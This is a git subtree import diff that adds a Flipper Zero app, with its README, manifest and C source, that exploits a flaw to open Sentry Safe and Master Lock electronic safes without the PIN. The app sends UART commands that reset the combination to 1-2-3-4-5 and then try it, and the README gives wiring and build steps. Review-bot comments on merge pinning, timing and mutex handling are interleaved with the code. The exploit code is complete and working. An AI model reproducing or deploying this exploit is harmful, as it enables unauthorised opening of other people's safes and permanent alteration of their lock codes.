
Add 'sentry_safe/' from commit '4eb9e1ff2f8149f8df1aaf966be73f019632330f'

git-subtree-dir: sentry_safe
git-subtree-mainline: 2c8ef60beaf0fd47ae2ef5811932e05df138f1d6
git-subtree-split: 4eb9e1ff2f8149f8df1aaf966be73f019632330f
Willy-JL %!s(int64=2) %!d(string=hai) anos
pai
achega
31c865451c

+ 5 - 0
sentry_safe/.gitremotes

@@ -0,0 +1,5 @@
+[remote "upstream"]
+    url = https://github.com/H4ckd4ddy/flipperzero-sentry-safe-plugin
+    fetch = +refs/heads/*:refs/remotes/sentry-safe/*
+[alias]
+    merge-upstream = pull --no-edit upstream master
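Review bot: The `merge-upstream` alias runs `pull --no-edit upstream master`, so each later update merges whatever is at the tip of the third-party `master` branch, with no pinned commit and no pause to review before the merge commit is created. The commit message records the split commit for this import, but nothing in this file carries that pin forward. Consider fetching first and inspecting the incoming diff before merging, and add a comment such as `# merges the current tip of upstream master unpinned; review the fetched diff before running`. How this file is loaded into the git config is not visible here, so whether the alias is used interactively or from automation should be confirmed.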

+ 21 - 0
sentry_safe/LICENSE

@@ -0,0 +1,21 @@
+MIT License
+
+Copyright (c) 2022 Etienne Sellan
+
+Permission is hereby granted, free of charge, to any person obtaining a copy
+of this software and associated documentation files (the "Software"), to deal
+in the Software without restriction, including without limitation the rights
+to use, copy, modify, merge, publish, distribute, sublicense, and/or sell
+copies of the Software, and to permit persons to whom the Software is
+furnished to do so, subject to the following conditions:
+
+The above copyright notice and this permission notice shall be included in all
+copies or substantial portions of the Software.
+
+THE SOFTWARE IS PROVIDED "AS IS", WITHOUT WARRANTY OF ANY KIND, EXPRESS OR
+IMPLIED, INCLUDING BUT NOT LIMITED TO THE WARRANTIES OF MERCHANTABILITY,
+FITNESS FOR A PARTICULAR PURPOSE AND NONINFRINGEMENT. IN NO EVENT SHALL THE
+AUTHORS OR COPYRIGHT HOLDERS BE LIABLE FOR ANY CLAIM, DAMAGES OR OTHER
+LIABILITY, WHETHER IN AN ACTION OF CONTRACT, TORT OR OTHERWISE, ARISING FROM,
+OUT OF OR IN CONNECTION WITH THE SOFTWARE OR THE USE OR OTHER DEALINGS IN THE
+SOFTWARE.

+ 26 - 0
sentry_safe/README.md

@@ -0,0 +1,26 @@
+# flipperzero-sentry-safe-plugin
+
+Flipper zero exploiting vulnerability to open any Sentry Safe and Master Lock electronic safe without any pin code.
+
+[Vulnerability described here](https://github.com/H4ckd4ddy/bypass-sentry-safe)
+
+### Installation
+
+- Download [last release fap file](https://github.com/H4ckd4ddy/flipperzero-sentry-safe-plugin/releases/latest)
+- Copy fap file to the apps folder of your flipper SD card
+
+### Usage
+
+- Start "Sentry Safe" plugin
+- Place wires as described on the plugin screen
+- Press enter
+- Open safe
+
+### Build
+
+- Recursively clone your base firmware (official or not)
+- Clone this repository in `applications_user`
+- Build with `./fbt fap_dist APPSRC=applications_user/flipperzero-sentry-safe-plugin`
+- Retreive builed fap in dist subfolders
+
+(More info about build tool [here](https://github.com/flipperdevices/flipperzero-firmware/blob/dev/documentation/fbt.md))

+ 14 - 0
sentry_safe/application.fam

@@ -0,0 +1,14 @@
+App(
+    appid="gpio_sentry_safe",
+    name="[GPIO] Sentry Safe",
+    apptype=FlipperAppType.EXTERNAL,
+    entry_point="sentry_safe_app",
+    requires=["gui"],
+    stack_size=1 * 1024,
+    order=40,
+    fap_icon="safe_10px.png",
+    fap_category="GPIO",
+    fap_author="@H4ckd4ddy",
+    fap_version=(1, 0),
+    fap_description="App exploiting vulnerability to open any Sentry Safe and Master Lock electronic safe without any pin code via UART pins.",
+)

BIN=BIN
sentry_safe/safe_10px.png


+ 169 - 0
sentry_safe/sentry_safe.c

@@ -0,0 +1,169 @@
+#include <furi.h>
+#include <gui/gui.h>
+#include <input/input.h>
+#include <stdlib.h>
+
+#include <furi_hal.h>
+
+typedef struct {
+    uint8_t status;
+    FuriMutex* mutex;
+} SentryState;
+
+typedef enum {
+    EventTypeTick,
+    EventTypeKey,
+} EventType;
+
+typedef struct {
+    EventType type;
+    InputEvent input;
+} Event;
+
+const char* status_texts[3] = {"[Press OK to open safe]", "Sending...", "Done !"};
+
+static void sentry_safe_render_callback(Canvas* const canvas, void* ctx) {
+    furi_assert(ctx);
+    const SentryState* sentry_state = ctx;
+    furi_mutex_acquire(sentry_state->mutex, FuriWaitForever);
+
+    // Before the function is called, the state is set with the canvas_reset(canvas)
+
+    // Frame
+    canvas_draw_frame(canvas, 0, 0, 128, 64);
+
+    // Message
+    canvas_set_font(canvas, FontPrimary);
+
+    canvas_draw_frame(canvas, 22, 4, 84, 24);
+    canvas_draw_str_aligned(canvas, 64, 15, AlignCenter, AlignBottom, "BLACK <-> GND");
+    canvas_draw_str_aligned(canvas, 64, 25, AlignCenter, AlignBottom, "GREEN <-> C1 ");
+    canvas_draw_str_aligned(
+        canvas, 64, 50, AlignCenter, AlignBottom, status_texts[sentry_state->status]);
+
+    furi_mutex_release(sentry_state->mutex);
+}
+
+static void sentry_safe_input_callback(InputEvent* input_event, FuriMessageQueue* event_queue) {
+    furi_assert(event_queue);
+
+    Event event = {.type = EventTypeKey, .input = *input_event};
+    furi_message_queue_put(event_queue, &event, FuriWaitForever);
+}
+
+void send_request(int command, int a, int b, int c, int d, int e) {
+    int checksum = (command + a + b + c + d + e);
+
+    furi_hal_gpio_init_simple(&gpio_ext_pc1, GpioModeOutputPushPull);
+    furi_hal_gpio_write(&gpio_ext_pc1, false);
+    furi_delay_ms(3.4);
+    furi_hal_gpio_write(&gpio_ext_pc1, true);
+
+    furi_hal_uart_init(FuriHalUartIdLPUART1, 4800);
+    //furi_hal_uart_set_br(FuriHalUartIdLPUART1, 4800);
+    //furi_hal_uart_set_irq_cb(FuriHalUartIdLPUART1, usb_uart_on_irq_cb, usb_uart);
+
+    uint8_t data[8] = {0x0, command, a, b, c, d, e, checksum};
+    furi_hal_uart_tx(FuriHalUartIdLPUART1, data, 8);
+
+    furi_delay_ms(100);
+
+    furi_hal_uart_set_irq_cb(FuriHalUartIdLPUART1, NULL, NULL);
+    furi_hal_uart_deinit(FuriHalUartIdLPUART1);
+}
+
+void reset_code(int a, int b, int c, int d, int e) {
+    send_request(0x75, a, b, c, d, e);
+}
+
+void try_code(int a, int b, int c, int d, int e) {
+    send_request(0x71, a, b, c, d, e);
+}
+
+int32_t sentry_safe_app(void* p) {
+    UNUSED(p);
+
+    FuriMessageQueue* event_queue = furi_message_queue_alloc(8, sizeof(Event));
+
+    SentryState* sentry_state = malloc(sizeof(SentryState));
+
+    sentry_state->status = 0;
+
+    sentry_state->mutex = furi_mutex_alloc(FuriMutexTypeNormal);
+    if(!sentry_state->mutex) {
+        FURI_LOG_E("SentrySafe", "cannot create mutex\r\n");
+        furi_message_queue_free(event_queue);
+        free(sentry_state);
+        return 255;
+    }
+
+    ViewPort* view_port = view_port_alloc();
+    view_port_draw_callback_set(view_port, sentry_safe_render_callback, sentry_state);
+    view_port_input_callback_set(view_port, sentry_safe_input_callback, event_queue);
+
+    // Open GUI and register view_port
+    Gui* gui = furi_record_open(RECORD_GUI);
+    gui_add_view_port(gui, view_port, GuiLayerFullscreen);
+
+    Event event;
+    for(bool processing = true; processing;) {
+        FuriStatus event_status = furi_message_queue_get(event_queue, &event, 100);
+
+        furi_mutex_acquire(sentry_state->mutex, FuriWaitForever);
+
+        if(event_status == FuriStatusOk) {
+            // press events
+            if(event.type == EventTypeKey) {
+                if(event.input.type == InputTypePress) {
+                    switch(event.input.key) {
+                    case InputKeyUp:
+                        break;
+                    case InputKeyDown:
+                        break;
+                    case InputKeyRight:
+                        break;
+                    case InputKeyLeft:
+                        break;
+                    case InputKeyOk:
+
+                        if(sentry_state->status == 2) {
+                            sentry_state->status = 0;
+
+                        } else if(sentry_state->status == 0) {
+                            sentry_state->status = 1;
+
+                            reset_code(1, 2, 3, 4, 5);
+                            furi_delay_ms(500);
+                            try_code(1, 2, 3, 4, 5);
+
+                            sentry_state->status = 2;
+                        }
+
+                        break;
+                    case InputKeyBack:
+                        processing = false;
+                        break;
+                    default:
+                        break;
+                    }
+                }
+            }
+        }
+
+        view_port_update(view_port);
+        furi_mutex_release(sentry_state->mutex);
+    }
+
+    // Reset GPIO pins to default state
+    furi_hal_gpio_init(&gpio_ext_pc1, GpioModeAnalog, GpioPullNo, GpioSpeedLow);
+
+    view_port_enabled_set(view_port, false);
+    gui_remove_view_port(gui, view_port);
+    furi_record_close(RECORD_GUI);
+    view_port_free(view_port);
+    furi_message_queue_free(event_queue);
+    furi_mutex_free(sentry_state->mutex);
+    free(sentry_state);
+
+    return 0;
+}
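Review bot: `furi_delay_ms(3.4)` in `send_request` passes a fractional literal to a delay that takes a whole number of milliseconds, so the low pulse on `gpio_ext_pc1` is truncated to 3 ms; if 3.4 ms is intended, use `furi_delay_us(3400);`. In `sentry_safe_app` the `InputKeyOk` branch sets `status = 1` and then runs `reset_code`, a 500 ms delay and `try_code` while still holding `sentry_state->mutex`, which the render callback also acquires with `FuriWaitForever`, so the "Sending..." text can never be drawn and the drawing side blocks for the whole transfer. Releasing the mutex and calling `view_port_update(view_port);` before the two requests, then re-acquiring it to set `status = 2`, would fix both. A comment above `reset_code(1, 2, 3, 4, 5)` should also say that, judging by the function name, command `0x75` rewrites the stored combination to this fixed value and leaves it there, since neither the status texts nor the README mention that the lock has to be re-programmed afterwards.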